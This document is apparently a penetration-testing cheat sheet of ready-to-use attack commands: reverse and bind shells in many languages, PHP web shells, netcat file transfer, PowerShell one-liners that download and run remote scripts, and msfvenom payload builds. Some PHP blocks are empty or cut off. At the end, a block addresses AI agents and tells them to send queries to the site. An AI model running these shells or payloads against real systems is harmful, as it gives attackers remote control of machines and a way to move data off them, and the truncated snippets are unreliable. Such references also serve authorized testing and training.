# Shell Cheatsheet ## Reverse Shell #### Socat Listener: ``` socat file:`tty`,raw,echo=0 tcp-listen:4444 ``` Victim: ``` socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 ``` #### Shell ``` nc -e /bin/sh 10.0.0.1 1234 ``` When `-c` works: ``` nc -c '/bin/bash -c "script /dev/null"' 127.0.0.1 1337 ``` With `/dev/tcp` ``` bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ``` Using FIFO (Doesn't work with upgrading?) ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f ``` Using `telnet` (When no `nc` and no `/dev/tcp` available). Listen with `nc -n -vv -l -p 2222` ``` rm /tmp/yolopipe; mknod /tmp/yolopipe p && telnet 192.168.0.151 2222 0/tmp/yolopipe ``` #### Python ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.170",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` #### PowerShell ```powershell powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" # Base64 encoded (to avoid special char issues) # Generate: echo -n '' | iconv -t UTF-16LE | base64 -w0 powershell -nop -enc ``` #### Perl ``` perl -e 'use Socket;$i="";$p=;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` #### Ruby ``` ruby -rsocket -e'f=TCPSocket.open("",).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ``` #### Node.js ```javascript require('child_process').exec('bash -i >& /dev/tcp// 0>&1') ``` #### Lua ``` lua -e "require('socket');require('os');t=socket.tcp();t:connect('','');os.execute('/bin/sh -i <&3 >&3 2>&3');" ``` #### Golang ``` echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp",":");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go ``` ### Bind Shell #### Socat Listener: ``` socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane ``` Victim: ``` socat FILE:`tty`,raw,echo=0 TCP:10.10.10.10:1337 ``` #### Bash ``` port=4444; if [$# -eq 1]; then port=$1; fi; while true; do nc -lp $port -e /bin/bash;wait; done ``` #### Telnet Lazy Bind Shell using `telnet`: Listen with `nc -n -vv -l -p 2222` and don't forget the `&` at the end ``` while true; do sleep 5; rm /tmp/yolopipe; mknod /tmp/yolopipe p && telnet 192.168.0.151 2222 0/tmp/yolopipe; done & ``` #### Python Connect via `nc`: ``` import socket as a; s = a.socket();s.bind(('0.0.0.0',1337));s.listen(1);(r,z) = s.accept();exec(r.recv(999)) ``` After connecting upgrade via: ``` import pty,os;os.dup2(r.fileno(),0);os.dup2(r.fileno(),1);os.dup2(r.fileno(),2);pty.spawn("/bin/sh");s.close() ``` #### PHP Simple Test ``` ``` Minimal system shell ```

 
```

Reverse shell using a socket (cmd version)

```
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
```

Reverse shell using a socket (file version)

```
&3 2>&3"); ?>
```

### Web Shell

#### PHP

Minimal webshell (`?cmd=ls`)

```
";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "

"; die; } ?> ``` Decodes the Base64 encoded string and evaluates the decoded string "system('ls -la');" as PHP code: ``` ``` Base64 encoded cmd webshell ``` ``` Execute system command ``` ``` ### Listener #### Shell **General Listener** Basic Listener, useful with upgrading ``` nc -vvlp 1337 ``` ``` stty -echo raw; nc -lp 1337; stty sane ``` **Listen on a specific IP** ``` nc -l -p 4444 -s 127.0.0.1 ``` ### Upgrading #### Socat Check section above (`Reverse Shell.Socat`) using a static binary. #### Shell * Use bash, not zsh * In reverse shell: Execute bash (for example using the Python method below) * In reverse shell: `export TERM=xterm-256color` * Switch to background with CTRL+Z * Configure local shell: `stty raw -echo` * Execute `fg` * In reverse shell: `reset` #### Python Once connected, use Python to spawn a bash process: ```python python -c 'import pty; pty.spawn("/bin/bash")' ``` Put this process into the background: ```bash ``` In your local shell, change the terminal settings and bring the background process to the foreground: ```bash stty raw -echo; fg ``` Finally, once the job is back in the foreground, you can set up the shell environment to be more user-friendly: ```bash export TERM=xterm ``` #### MSF ``` use post/multi/manage/shell_to_meterpreter ``` ### Fix Width On attacker host: ``` stty -a ``` In (`socat`) shell: ``` stty rows 57 cols 211 ``` ### Transferring files (e.g. socat or tsh) #### Attacker = Listener Sender: ``` nc -vvlp 1337 < file ``` Receiver: ``` nc > /tmp/yolofile ``` #### Victim = Listener Receiver: ``` nc -l -p 1234 > out.file ``` Sender: ``` nc -w 3 1234 < out.file ``` ### Aliases ``` alias "l"="ls -la" && \ alias ".."="cd .." ``` ### Upgrading with rlwrap ```bash # Wrap listener with rlwrap for arrow key support rlwrap nc -lvnp ``` ### Upgrading with script ```bash # Alternative to python pty script -qc /bin/bash /dev/null # Then Ctrl+Z, stty raw -echo; fg ``` ### Windows Reverse Shells ```powershell # Nishang Invoke-PowerShellTcp IEX(IWR https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 -UseBasicParsing); Invoke-PowerShellTcp -Reverse -IPAddress -Port # ConPtyShell (fully interactive Windows reverse shell) IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp -RemotePort # On listener side: stty raw -echo; (stty size; cat) | nc -lvnp ``` ### MSFVenom Payloads ```bash # Linux msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf -o shell.elf # Windows msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe -o shell.exe msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o meterpreter.exe msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f dll -o shell.dll # Web payloads msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f asp > shell.asp msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw ``` ### Resources * [Pentest Monkey](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) * [revshells.com](https://www.revshells.com/) - Reverse shell generator * [xl7dev](http://blog.safebuff.com/2016/06/19/Reverse-shell-Cheat-Sheet/) * [Shell upgrading](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/) * [Web Shells Introduction](https://www.acunetix.com/blog/articles/keeping-web-shells-undercover-an-introduction-to-web-shells-part-3/) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.ctrl-z.rocks/cheat-sheets/shells/shell-cheatsheet.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.